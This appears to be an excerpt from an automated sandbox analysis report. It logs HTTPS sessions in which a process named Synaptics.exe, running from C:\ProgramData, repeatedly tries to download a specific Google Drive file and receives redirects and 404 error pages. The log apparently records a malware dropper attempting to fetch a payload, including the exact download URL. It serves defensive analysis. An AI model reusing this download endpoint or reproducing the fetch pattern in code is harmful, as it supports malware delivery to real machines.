                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:20 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:20:20 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 45 4b 69 50 4c 7a 36 62 55 56 30 41 52 73 55 39 4c 5f 39 36 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="nEKiPLz6bUV0ARsU9L_96g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:20 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.449781142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:24 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-LuhGcBBTCTONA-YVUmjmuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.449780142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:24 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GYvC9lMF11fPwhvZCVNTTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.449784142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gjTKdkUf5-G0oE47DXqKRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.449786142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7stqITSD3PgerT1bX0gZJXMPNKWyLTsQK0sgeDHedi5BeByHb7tSPiT1qpG-bZGi4m
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:26 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-j1k3x-rTkNYqY5G-xCTHiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:20:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 62 6c 49 47 5f 38 62 57 41 63 54 6f 72 4b 6d 4f 43 35 61 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="ZblIG_8bWAcTorKmOC5aQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:20:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.449787142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:27 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4y0zf8AKmqhh7DNdWzjCeVamfZYOSWlMMEzuTCOlfuXMtK2sDOjMr1Jo2nZ4YDAt1bhPwVGpw
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:27 GMT
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZZMk8UVLiGh4VY-Pe_yDRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:27 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:20:27 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 64 52 4a 39 63 5f 33 5f 64 39 63 50 32 7a 49 56 34 44 57 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="9dRJ9c_3_d9cP2zIV4DW3g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:27 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                17192.168.2.449785142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-2Oeix1kbhMZhu3GS3V4gMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                18192.168.2.449797142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fvlCYELl41PqXhkerO9T9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                19192.168.2.449796142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-buDtSk0XLYAIC6ror5To0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
